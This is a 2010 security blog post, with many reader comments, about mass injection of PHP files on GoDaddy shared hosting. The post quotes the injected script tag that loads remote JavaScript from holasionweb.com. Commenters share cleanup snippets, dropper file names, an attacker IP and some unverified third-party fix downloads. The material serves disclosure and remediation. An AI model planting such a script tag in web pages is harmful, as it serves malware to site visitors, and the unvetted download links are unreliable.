• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Lots of sites reinfected – Now using holasionweb.com

May 12, 2010David Dede

FacebookTwitterSubscribe

Update2: Reply from GoDaddy: https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

Update: Code used to exploit found: https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

We just got reports this morning of hundreds of sites getting reinfected at GoDaddy (shared servers). This is the new javascript being added to the sites:

< script src =”http://holasionweb.com/oo.php”>< /script>

The changes were all made this morning between 2am and 3am, changing all PHP files with this new code.

All the sites we checked so far were updated (WordPress 2.9.2) and using good permissions. Plus. not all of them were using WordPress. I don’t want to see the “users were not updated” excuse again, please. GoDaddy, any ideas to what is going on?

Note that our previous solution will still clean it up: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

The details are all the same from the previous attack, just using a new host (and new victims):

https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html
http://sucuri.net/malware/entry/MW:MROBH:1

Notice that this is not related to one specific platform. Most of the sites we checked were using WordPress, but some were on Joomla or using other web applications. Plus, very annoying since all the PHP files get modified.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

FacebookTwitterSubscribe

Categories: Website Malware Infections, Website SecurityTags: Hacked Websites

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Noam Rathaus

    May 12, 2010

    Hi,

    You got a broken link there…
    "https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html
    http://sucuri.net/malware/entry/MW:MROBH:1&quot;

    Is one "broken" link…

  2. http://sucuri.net

    May 12, 2010

    Noam: Thanks! fixed.

  3. ReadJunk

    May 12, 2010

    Thanks this worked!

    I made a mistake with godaddy because I did in file manager a file restore to last week without backing up my latest posts in wordpress. I didn't think it would revert the posts back and it didn't at first, but now the posts are gone since the last time I did a restore when this happened already. i reverted back to yesterday now and the post never showed up. Any ideas what happened??

  4. maximespam@hotmail.fr

    May 12, 2010

    Hello,
    my website (wordpress 2.9.2, hosted on godaddy) was infected by this worm too.

    Everybody submit a solution to clean up the website, but nobody submit a FIX, or the origin of the vulnerabilty !

    We dont know if it's a Godaddy Vulnerability, or a WordPress Vulnerability.

    Why nobody try to find the vulnerability origin ?

    Sorry for my english.

    M.

  5. Max

    May 12, 2010

    Oops, i've put my email in the wrong input.
    Can you modify my email to name please ?

    Thx.

  6. Elizabeth

    May 12, 2010

    I found the javascript in my theme's footer.php but don't see it any other php files I've checked. I tried running the script to cleanup the site (in case I missed something) but because bluehost deactivated my sites, I can't get the script to work. How does one run it on a deactivated website?

  7. Anonymous

    May 12, 2010

    Thanks again. My sites seemed to become reinfected. My host, a front for GD have just had another email from me.

    I'm close to moving to another provider.

  8. Anonymous

    May 12, 2010

    we got hacked too.. on shared godaddy hosting.. but we didnt have any wordpress on our site in particular. we did have sugarcrm (the only new addition in the last week)..

    your script worked, thanks

  9. Anonymous

    May 12, 2010

    Once again, thank you so much guys. You have been infinitely more helpful than GoDaddy. I am becoming an extremely unhappy customer. PHPBB3 hacked again last night. Your fix worked again this morning.

  10. chris

    May 12, 2010

    For what it's worth, there were two sites that I maintain for a client on GoDaddy that were infected last week. As ridiculous, unlikely and nonsensical as GoDaddy's "explanations" were, they implied the site was infected because there was an old WP installation hanging around that wasn't being used. I thought that particular site (which was for an old blog that my client wasn't using anymore) was in the root directory, therefore a completely different directory tree from the other sites, but actually it was just in a subfolder in the main site's folder. Since I deleted that folder, we haven't gotten reinfected. I don't believe that this could be the case for everyone, but it does seem to lend some amount of credibility to the "outdated WordPress" theory GoDaddy's going with…

  11. Anonymous

    May 12, 2010

    Infected this morning. Absolutely no wordpress or any other prepackaged app in our folders. Only php and html files.

  12. Mathieu

    May 12, 2010

    My site is in php and was also infected….I lost around 300$ in revenue this morning $%#%$#%

    I will change my hosting compagny at the end of the month….

  13. rvtraveller

    May 12, 2010

    Happened to every PHP file on my shared GoDaddy hosting both this time and last time. On my hosting I have SMF 1.1.11 and phpMyAdmin (most current version) so this corroborates your earlier post with it being a vulnerability in phpMyAdmin. I of course contacted GoDaddy and they gave me the usual garbage about my responsibility to keep scripts up to date and how to notice malware. Completely useless. However, I just restored everything from a backup I had a few days ago and all is well, for now…

  14. rvtraveller

    May 12, 2010

    O, I forgot in my last post to mention that I don't get redirected by the javascript, only my users do. So my speculation is:

    Script is injected through a vulnerability somewhere (possibly phpMyAdmin)

    When a user visits an infected page, the script checks for a leftover phpMyAdmin cookie. If this cookie exists, then the script assumes that this person is an admin for the site and hence doesn't redirect them so they don't suspect anything is wrong.

    If the cookie is not set, this person must be a regular visitor of the site so redirect them.

    Just my speculation.

  15. Anonymous

    May 12, 2010

    Got hacked with 2 hosts – vBulletin and one with custom php files

  16. Anonymous

    May 12, 2010

    This is freaking nuts.

  17. ASchur

    May 12, 2010

    My SMF 2 forum on Godaddy has this as well. This is the second issue in two weeks for my

  18. ReadJunk

    May 12, 2010

    Go Daddy wants 150 bucks from me to use a backup of their database to get a week's worth of postings. Unreal! Does anyone recommend a good hosting company? I might be willing to do dedicated hosting this time, just to not put up with shared hosting anymore.

  19. Maxime

    May 12, 2010

    I've made a temporary solution, to fast clean up client-side, the malicious script.

    This script need jQuery.

    // Execute the script a first time
    findMaliciousScript = $("body").find("script").attr('src','http://holasionweb.com/oo.php&#39;);
    $(findMaliciousScript).removeAttr("src");

    function launchTimer() {
    timer = setInterval(loop, 0);
    }
    function clearTimer() {
    clearInterval(timer);
    }
    function loop() {
    findMaliciousScript = $("body").find("script");
    if (findMaliciousScript.attr('src') == 'http://holasionweb.com/oo.php&#39๐Ÿ˜‰ {
    $(findMaliciousScript).removeAttr("src");
    findMaliciousScript = '';
    }
    else {
    clearTimer();
    }
    };

    // And loop it, the loop stop when the src is deleted.
    launchTimer();

  20. Bourgy.com

    May 12, 2010

    I paid the $150 once, now I back up sorta regularly.

    But seriously though GoDaddy are playing with fire here cause many people are surely considering another host.

    Maybe Dreamhost should make us an offer.

    You know what, I think I'll write them.

  21. Josh

    May 12, 2010

    Happened to over 2,000 of my PHP files this morning…. and the Web Fix worked like a charm.

    LIFE SAVER! Thank you so much!

    I do have an old install of WP on my site too… upgrading as I type. F GoDaddy in the A.

  22. Anonymous

    May 12, 2010

    @rvtraveller you are absolutely spot on right with the PMA cookie tracker.
    The script drops a cookie named "pma_visited_theme1", with a value of "1" (in the sites I've seen so far anyways).

    Many of the sites i'm managing (of course on GoDaddy) do run wordpress, but the majority of them don't, so I suspect this is systemic of the shared server environment. A vulnerability thru PMA would make sense, since a compromised PMA in a given cluster would expose those sites stored in the same cluster.

    GoDaddy at this point is rivaling BP, Haliburton, and TransOcean(?) for the top spot in fingerpointing…

    I highly recommend migrating away from GoDaddy, not only b/c of this security problem, but b/c there Customer Service has reached epic f@il levels.

    -C

  23. Bourgy

    May 12, 2010

    Question, how long did the script run for you guys.

    Mine took like 10 seconds and I wonder how it could have cleaned so many php files that quickly

  24. ReadJunk

    May 12, 2010

    @Bourgy.com yeah i have back up from last week, but didn't think by doing their restore it would overwrite the database changes too, just the actual files. I just installed wordpress db backup to have emailed me everyday. then it's off to find a new hosting company!

  25. Elizabeth

    May 12, 2010

    After I cleaned up some of my files, bluehost reactivated my site. I ran the fixer script and everything seems to be working fine now. Will continue cleaning out old plugins and themes.

  26. Bourgy

    May 12, 2010

    Did Godaddy take down sites this morning after the attack? Because my traffic is much lower than usual

  27. Big Bear Butt

    May 12, 2010

    My WordPress 2.9.2 site hosted at GoDaddy has been the victim of both of the most recent hacks. The listed fix you developed worked like a charm.

    When GoDaddy was sent a trouble ticket this morning to let them know about our incredible displeasure at their response to date, this is an exact copy of the key part of their response to me.

    GoDaddy's response begins;

    Thank you for contacting Online Support.

    Our Security Operations Center (SOC) is aware of the attacks and has been working with leading WordPress security experts to identify the root cause of the issue. We provide the shared hosting server to you in a clean, uninfected state, and we have security measures in place and anti-virus software installed to ensure the integrity of our hosting accounts. Please note that our SOC found that these attacks have occurred as a result of security vulnerabilities in older versions of WordPress installations on customer hosting accounts. A member of our Security team recently addressed the issue at a teleseminar. You may find more information, including the audio replay of the teleseminar, at the below link:

    http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

    We recommend you update your WordPress installation to 2.9.2 to eliminate the security vulnerabilities existing in prior WordPress versions. There are several steps to upgrading your WordPressยฎ installation.

    End copy of their email response to me.

    I want to say again, we ARE running the latest WordPress 2.9.2 on our site. Right now. I'm looking at the dashboard.

    GoDaddy's response to me is to blame an old WordPress version, when they are currently hosting the latest one for me right now. They didn't even bother checking what version I am using that got hacked before telling me that it is, in effect, my fault or WordPresses fault, but not theirs.

  28. BC

    May 12, 2010

    @Bourgy – let me ask, What do your stats look like for SE referrers? I ask that b/c if compromised sites all have the same IP Address attached to it, then SEs like Google will take notice of said-exploit attached to the IP Address of these sites and throttle back ranking to limit searcher exposure (not to mention attach a "Malicious Website" notice to the site's SE Listing). At that point it's less GoDaddy taking your site down and hence limiting your traffic and more a negative SEO component. For others hurt similarly and not having been hacked, It's the good ole "One Bad Apple" effect.

  29. Bourgy

    May 12, 2010

    My email to them instructed not to bother with nonsensical reply asking me to update wordpress. This what they sent me:

    Dear Sir or Madam,

    Thank you for contacting Online Support. While there are no ways to ensure that any site is 100% safe from malicious intended attacks. Not only do we constantly strive to combat these attacks, we ask our customers to be vigilante as well to help in this struggle. Other than the remedies offered previously we have no new information or ways to correct these issues. We appreciate your understanding in this matter.

  30. 1WineDude

    May 12, 2010

    I was reinfected today as well, GoDaddy shared hosting. Their support has been useless.

  31. Bourgy

    May 12, 2010

    BC I usually have 2000 SE referees at this time. It's around 800 so far.

    I am not sure about a Google penalty because I actually refreshed my site at the exact moment the attack occurred. Unless the penalty is from a previous attack that's only now taken effect

  32. Anonymous

    May 12, 2010

    My website is hosted at Godaddy but is not a WordPress site, my site is programmed in PHP and is a site of own authorship.

    I applied a solution I found in your site and which has been very useful, in spite of that, as I said before, my site is not done in WordPress (http://sucuri.net/malware/helpers/wordpress -fix_php.txt)

    With the source code that you have used to cure the infection of php files, can use the same approach to infect?

    I ask this because if so it is not surprising that a simple php file, placed in the root folder of an FTP user with privileges higher than many other FTP users, can infect all files under your tree.

    Sorry if my English is a bit poor, but the message was fully translated with Google Translator.

    Thanks for the input of your blog.

  33. Anonymous

    May 12, 2010

    Seriously, I'm sick of Godaddy's bullshit, all of my wordpress installs were fully upgraded and yet we've still been hacked twice. It's obviously a security issue with their server. I'm switching if possible. (Don't know how to move a large database) ๐Ÿ™

  34. Kernel Paniker

    May 12, 2010

    I too was hacked. GoDaddy shared hosting. I have hand coded PHP and commercial PHP scripts.

    While you script seems to have removed the malware, Zen Cart, phpMyDirectory and Post Affiliate Pro are a little broken at the moment.

  35. Gregg Blanchard

    May 12, 2010

    Your wordpress-fix.php script removes the code but it also left a single blank line of text at the top of every file giving me "headers already sent" errors all over the place.

    A fix coming soon for that?

  36. Anonymous

    May 12, 2010

    Hacked Again. Had a backup and it took me 20 minutes. Then I ran the script just in case. The script was hidden in the wp-footer. I want out of godaddy but I am scared to not do the transition correctly

  37. Archer

    May 12, 2010

    i have the same problem, wordpress-fix.php script leaves a blank line at the top of every file. Is there a fix?

  38. Kernel Paniker

    May 12, 2010

    That blank line messes up sessions for browsers…

  39. Daniel

    May 12, 2010

    I updated my Gumblar script to remove this malware, too:

    http://www.danielansari.com/wordpress/2010/05/holasionwebcom/

    This uses a regular expression that does NOT leave any blank lines at the top.

  40. Anonymous

    May 12, 2010

    My websites were hacked the second time today (most recent versions, GoDaddy). To prevent visitors from infection in the future I made a cron job to run wordpress-fix.php twice an hour

  41. Anonymous

    May 12, 2010

    my ftp hacked too
    infected more than 30000 php files on my sites
    i got to write php script to clear all my files

    this is russian hacker
    we need to find partner program of this virus
    only then we can stop this shit

  42. Kathy

    May 12, 2010

    I've been hacked 4x in 5 days on two different GoDaddy hosting accounts. I signed up for Sucuri Security and ran a scan. It said I had malware in the cgi-bin/php.ini and that I needed to delete it. But it said that this has been a problem over at Network Solutions, not GoDaddy. I didn't have a cgi-bin folder in my hosting account, so called GoDaddy customer service. She put me on hold for a few minutes and came back saying they ran some scan and yes, there is a big problem there that they'll need to look into. We (as users) don't have access to the cgi-bin folder…only they do – so they were going to "escalate it" and look into how someone got into that folder to plant that php.ini file in there. This would explain why the problem keeps showing up on my GoDaddy account almost every day, even tho I clean it off and why the "quick fix" didn't work for me — it must not be able to get into the cgi-bin folder when it's at GoDaddy??

    If you are on GoDaddy and keep cleaning your site and it keeps coming back: Call GoDaddy and tell them you understand the malware is residing in the cgi-bin folder (which the customer service girl didn't even know existed, by the way) and since you don't have access to it, they need to run their scan and see that this is where the problem is!!

  43. Anonymous

    May 12, 2010

    WPsecuritylock updates: It is going worldwide and spreading to other hosting companies. DAMNG IT!

  44. lisa hazen

    May 12, 2010

    I'm really getting p!ssed that GoDaddy is suggesting that it is just sites that weren't updated. All my sites were running WP 2.9.2, and four were hacked!!!

  45. GoDaddy.com

    May 12, 2010

    We hear your frustration. For full details, see our blog: http://community.godaddy.com/godaddy/whats-up-with-go-daddy-wordpress-php-exploits-and-malware/?isc=smfor1

    If you're site's been affected, please fill out the form listed in the article.

    Alicia

  46. Anonymous

    May 12, 2010

    To GoDaddy.com:

    I've filled out your form TWICE and have gotten no response either time. Just an email confirmation that I filled out the form!

    This is ridiculous!

  47. ReadJunk

    May 12, 2010

    I filled out the form twice and NOTHING. I had to call only to get clueless reps on the phone who didn't know a damn thing

  48. Peter

    May 12, 2010

    After 2 weeks of attacks on my GoDaddy hosted WordPress and Drupal sites, I know perfectly well how to CURE the problem.

    But up to now, I have not seen any report on how to PREVENT the problem.

    Any ideas anyone? I am tired of cleaning up my sites…!

  49. Caitlin

    May 12, 2010

    Yeah, GoDaddy's pretty useless. They obviously don't know what's going on, that's why they keep playing the "it's your fault, it's wordpress' fault" game.

    Thanks for the script. Glad someone's trying to help solve this problem. I've been hacked three times in the last month. Cleaned up all my files, up to date on WP, and have complex passwords but I still keep getting hit. GoDaddy's response each time is to send me form responses that don't help me at all.

  50. Bourgy

    May 12, 2010

    When I run the script I don't get that cgi bin message. And the script only runs like 15 seconds.

    Can someone tell me of their experience with the script (length of time it runs, etc, messages) because I'm having doubts the script worked for me

  51. Jean Paul Claude Bumhole

    May 12, 2010

    Peter, I belive the problem is with godaddy themselves, And its a problem they need to fix, everybody should email them and tell them its THERE FAULT.

    I dont see how you can prevent a problem as the heirachy for control is out of our hands.

    I belive that, As all these sites are hosted on Shared servers, There is a problem somewhere that is allowing user(s) to control the whole server and not just there allocated space on the server, Therefore giving them control of everybodie(s) site(s) instead of just there own.

  52. Anonymous

    May 12, 2010

    GODADDY!!!! STOP PLAYING THE PR GAME and FIX THIS!!!! I'm tire of the run around, the hacks, and the endless clean ups.

  53. Ryan

    May 12, 2010

    My Joomla site (1.5.16) was infected. It is hosted on a shared Linux server through GoDaddy.

    I used the fix and everything seems to work. This happened before (over the weekend) and I simply uploaded a backup of the website which worked temporarily.

    GoDaddy is trying to tell me that I am an isolated incident, but reading the comments here leads me to believe that we're all suffering the same problem and it's not all our fault.

    I'm not entirely sure everything is fixed yet because the Sucuri Web-based Integrity Monitoring system says that I am still infected (though it says the last check was 4 hours ago, so I'll wait until that updates before freaking out).

    Thanks for posting this fix. I'll be back if there are any future attacks.

  54. lisa

    May 12, 2010

    Hey, Go Daddy! You know what I find ironic? When I try to post a comment to your BS blog post about keeping our version of WP up-to-date, I get a 500 error!

  55. Peter

    May 12, 2010

    @Lisa: I notified this to Godaddy. they answered:

    "We're investigating that. If you get an error trying to register for the Community, please refresh the page after it errors out."

    Peter

  56. Peter

    May 12, 2010

    @bourgy: the script runs for about 30 seconds on my sites…

  57. Bourgy

    May 12, 2010

    Thanks Peter, I was worried 30 seconds was too short, but I guess it works quickly.

  58. Kris

    May 12, 2010

    This has been the third time in the last two months all our php files on GoDaddy have been hit with this.

  59. Anonymous

    May 12, 2010

    I'm on a linux shared hosting on GoDaddy and have been attacked 3x now including the this last one.

    For those of you who have access to your history, please check to see if there are any unusual files that was "deleted" from your root directory on 5/11. I found one on 5/11 at 9:00pm. I still had access to it even when it was deleted and saw that this was the malware code in php. It was named him_vivie.php

    Anyway it was deposited then deleted. So you won't find it if you look at your present directory.

    My FTP logs does not show any intrusion from FTP during that time. So this has got to be a server issue.

  60. Anonymous

    May 12, 2010

    GoDaddy customer here. I've had two sites infected twice each in the last week. I noticed that when I went to update the wordpress authentication keys, they were missing from the wp-config.php file. They're in the backup file but the file on the GoDaddy server had the auth keys missing.

    Is it possible that the hack removes the auth keys and that's why site are getting re-infected so quickly?

  61. Anonymous

    May 12, 2010

    Can anyone please recommend a good SECURE and solid, and relatively inexpensive alternative hosting company?

    And how hard is it to switch?

    Thanks!!

  62. JohnR

    May 12, 2010

    @rvtraveller and -C,

    If it's a potential vulnerability with phpMyAdmin on GoDaddy, what if anything can we do to protect our sites?

    Not use phpMyAdmin, delete all cookies, anything? Thanks very much.

  63. Anonymous

    May 12, 2010

    Godaddy Customers,

    You can get infected from your own sites. Everyone needs to be doing at least one, and preferably two, antivirus and antispyware scans on their local computers, using two different scanners you don't normally use, to find threats that got past the AV scanner you were using. Some free scanners are at: Trend Micro Housecall, Kaspersky, Malwarebytes, Symantec (Norton), BitDefender, Windows Live OneCare, Computer Associates, McAfee, F-Secure.

    Do it.

  64. go4reward

    May 12, 2010

    godaddy refuse to admit its own problem. They blamed me for the virus infected on my site.

  65. Jamie

    May 12, 2010

    What's the difference in price for GoDaddy's dedicated hosting vs. shared hosting? $30 per month instead of $30 per year?

    Seems these viruses would be a great way for GoDaddy to get people to switch to dedicated hosting in order to make more money.

    …..i'm just sayin……

    The sad thing is, they might not lose customers because of this malware issue, but they WILL lose customers because of their "it's not us- it's you" responses/attitude toward it.

  66. Anonymous

    May 12, 2010

    I had the latest copy of wordpress, had an htaccess file to only allow ip access to the wpadmin folder. installed exploit scanner, wp-security admin, and wp firewall. Also changed permissions on the wp-config file to 700. Got hacked anyway.

    I left the site down while moving it to a new host by renaming the wordpress directory to "wordpressxyz" and just using html files with "site under maintenance".

    I'm glad I did – all php pages infected AGAIN – and this while wordpress is not available.

    I can't believe godaddy cannot figure out what is going on.

  67. Jamie

    May 12, 2010

    I should also qualify my statement above by saying that I've read that it's not just GoDaddy hosted sites that are getting infected. Other hosts are having the same issue too, so everyone considering jumping ship would do best to wait, lest they move the whole thing and it happens all over again.

    My (GoDaddy hosted) blog has been hacked twice in the past week, and like many people above, I tried *everything* to fix it. The only thing that worked, ironically comes from GoDaddy themselves, and that's a restore to history in the hosting control panel. I got infected again this morning and I did this, and only this, and it worked like a charm. I only hope it will continue to work for every new time this happens. I better clear my schedule every day to work on this!!

    You can read more about the restore to history process on my blog here, which details it for even tech-dunces like me. ๐Ÿ™‚

    http://www.cowbellyblog.com/2010/05/12/the-best-way-to-remove-malware-from-a-wordpress-blog-using-godaddy/

  68. 1WineDude

    May 12, 2010

    Thanks for the idea of scheduling the fix php script via cron – got it running hourly now.

    Interestingly, after my site was impacted I changed my WP, GoDaddy, and FTP passwords. They are not easy to guess and would take a considerable amount of time to hack, so I'm fairly certain at this point that the issue is not simply WP and it's certainly not a password brute force attack…

  69. Anonymous

    May 12, 2010

    Fuck you GoDaddy!
    Second attack in the last 12 days.

    Thank you very much $&%&%%&$(/ยท"!

  70. Anonymous

    May 13, 2010

    I also see the PHP infection file in my GoDaddy backup from 5/11/2010 with a "Date Modified" of 5/11/2010 9:31:34 pm. The file was named kinsley_hershel.php and was deleted. (I would assume it was deleted after it ran and infected EVERY PHP file again.

  71. Mart

    May 13, 2010

    As far as I can see my site hasn't been infected (luckily) but it is running so so slowly – is that just a knock-on effect of being on Godaddy shared hosting and maybe other users on my server are infected? It's so frustrating.

  72. Bourgy

    May 13, 2010

    Can we have an instruction on hos to run a cron job?

    I see we can do it with GoDaddy but I don't know what to enter, script wise.

  73. Anonymous

    May 13, 2010

    What version of php is this happening with?

    Some of the hosting companies listed above still have older versions of php as the default for many of their customers.

  74. SEO

    May 13, 2010

    Solution with instrutions.
    http://www.perustudios.com/psfix.rar

  75. Anonymous

    May 13, 2010

    My drupal hosted on godaddy has been infected too. Twice. I cleaned manually the code and I'm waiting.

  76. Anonymous

    May 13, 2010

    My drupal 5.2 has been hacked. Restored all files, but didn't work. Could this be in the database? I even went into the theme's page.tbl.php and inserted text just below the last body tag… but the exploited malware script still showed between my text and the last body tag. This appears to be an infection of PHP itself and not Drupal. I have 6 WP sites as well and they've all been hacked several times. Even 1 WP site which is not viewable to the web (a playground) and it was hacked. Even php files I wrote myself outside of any WP site and they were hacked. I'm a veteran software engineer and seriously believe this to be a big time flaw with GoDaddy security. Any new news on the Drupal Hack? I've set all my WP directories even for the admin to no 'Write' permissions. So, if they hack my WP sites, they are using some other account than my administrative account. Hmmm Godaddy, what you say about that?

  77. Anonymous

    May 13, 2010

    Thank you, sucuri.net! You've helped us recover very quickly from this crud. It automatically infects IE 8! Terrific. Even older versions of Mozilla are relatively safe.

    In our case I think the initial drop file was called "1ndex.php".

  78. Anonymous

    May 13, 2010

    Also got attacked twice in the last week with PHP pages (no CMS). Godady gave me a canned response saying it's my fault.

  79. Anonymous

    May 13, 2010

    Correction to the above; not "1ndex.php", but rather we were affected by a file "she_elijah.php" that was deleted after 9 PM on 5/11/2010, by GoDaddy File Manager time. We're not WordPress. If anyone figures out how these were dropped, PLEASE post it.

  80. Anonymous

    May 13, 2010

    As a data point, NONE of our passwords were easily guessable or easily brute-forceable.

    And it's not just GoDaddy either… News reports indicate several other SHARED hosting providers, including DreamHost and Network Solutions (who have APOLOGIZED). Database vulnerability?

    http://www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks

    http://www.scmagazineus.com/widespread-attacks-continue-against-wordpress-sites/article/169956/

  81. Anonymous

    May 13, 2010

    Those long URLs linkified, but may get spamblocked…

    http://www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks

    http://www.scmagazineus.com/widespread-attacks-continue-against-wordpress-sites/article/169956/

    There are a few more in Google News.

  82. Anonymous

    May 13, 2010

    There is another script cleaning all infections. It is here and everyone says it works like a charm. What do you guys think? It is better to get prepared for the next attack.

    http://www.danielansari.com/wordpress/2010/05/holasionwebcom/

  83. Anonymous

    May 13, 2010

    Guys, I downloaded my logs — here's the IP address of the machine executing the dropped PHP file on my site.

    188.165.200.96

    France. Who'd have thought. Going back to 5/10 I do NOT see any other hit from that IP address OR regarding that file! So the file was not dropped via http ?

    188.165.200.96 – – [12/May/2010:04:xx:xx -0700] "GET http://www.mysite.example.com/she_elijah.php HTTP/1.1" 200 60 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    I hope this helps!

  84. Anonymous

    May 13, 2010

    Good Solution @SEO
    "http://www.perustudios.com/psfix.rar&quot;
    thanks.

  85. Seth D. Olson

    May 14, 2010

    I have seen a lot of WP cleaners, but nothing for Drupal yet. I have 2 infected drupal sites which are hosted on GoDaddy. I see the <"http://holasionweb.com/oo.php"> malicious script below my footer in both sites. I've searched in all my .php files and the code is not in those files. I will submit a ticket to godaddy, though we'll see what happens. Also, interesting thought is that I have 2 other sites that are drupal sites through GoDaddy, and thery not affected yet. Only thing I have actually updated recently is adding Google Adword Image codes (uses their .js and flash images). Doubt there is a connection, but I am looking at every possible angle.

  86. Peter

    May 15, 2010

    @seth

    The WP cleaners work for Drupal also as the infection is identical… My Drupal site got infected the same way as my WP sites got infected.

    You might have to add
    set_time_limit(0);

    at the start of the script, though, as otherwise it might timeout before the cleaning is finished.

    Peter

  87. mansoor

    May 17, 2010

    i can find that there is a script from holasionweb at the end of source code of my website but i can not locate it either in footer.php or have checked other php files randomly but not found…….how can i find that where is it located?

  88. Diolt.com

    May 24, 2010

    Hey Devid Dede!

    Thanks for answering on my question at http://badwarebusters.org/main/itemview/18157. I several emails to Godaddy they has fixed the problem on my website (Www.diolt.com) I wasn't sure how did it happened..

    Thanks again

  89. Nicholas

    June 8, 2010

    Just had my GoDaddy hosted WordPress site hacked again as of 2:17pm pst. Please be aware that there is a new wave of attacks going on. I just ran the repair script and all seems ok…. reporting to GoDaddy right now.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.